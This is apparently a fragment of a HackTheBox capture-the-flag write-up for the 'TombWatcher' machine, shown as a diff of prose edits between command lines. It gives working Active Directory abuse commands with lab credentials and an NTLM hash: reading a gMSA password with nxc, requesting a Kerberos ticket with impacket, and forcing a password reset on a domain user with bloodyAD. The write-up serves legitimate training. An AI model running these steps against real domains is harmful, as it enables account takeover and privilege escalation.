HTB - TombWatcher

 1 | $ bloodyAD -u alfred -p 'basketball' -d tombwatcher.htb --dc-ip 10.10.11.72 get membership alfred |

-group can ReadGMSAPassword
+The infrastructure group can ReadGMSAPassword over ANSIBLE_DEV$ machine account.

-Using nxc’s gmsa module, we could read that gmsa password as alfred
+Using nxc’s gmsa module, we could read that gmsa password as alfred member of the infrastructure group.

 1 | $ nxc ldap 10.10.11.72 -u 'alfred' -p 'basketball' --gmsa |

-allowing it to change his password.
+Ansible_dev$ machine account had ForceChangePassword over sam allowing it to change his password.

-domain machine account.
-Firstly, we would need to request a TGT ticket for that ansible_de$
+We could exploit that ACL using bloodyAD as ansible_dev$ domain machine account.
+Firstly, we would need to request a TGT ticket for that ansible_de$ since we will use bloodyAD to change the user’s password.

 1 | $ impacket-getTGT -dc-ip 10.10.11.72 tombwatcher.htb/ansible_dev$ -hashes ':4f46405647993c7d4e1dc1c25dd6ecf4' |

-Once we got that TGT ticket, we used it to change sam
+Once we got that TGT ticket, we used it to change sam domain account’s password.

 1 | KRB5CCNAME=ansible_dev\$.ccache bloodyAD -k -u ansible_dev$ -d tombwatcher.htb --host 'dc01.tombwatcher.htb' set password sam 's@m_123' |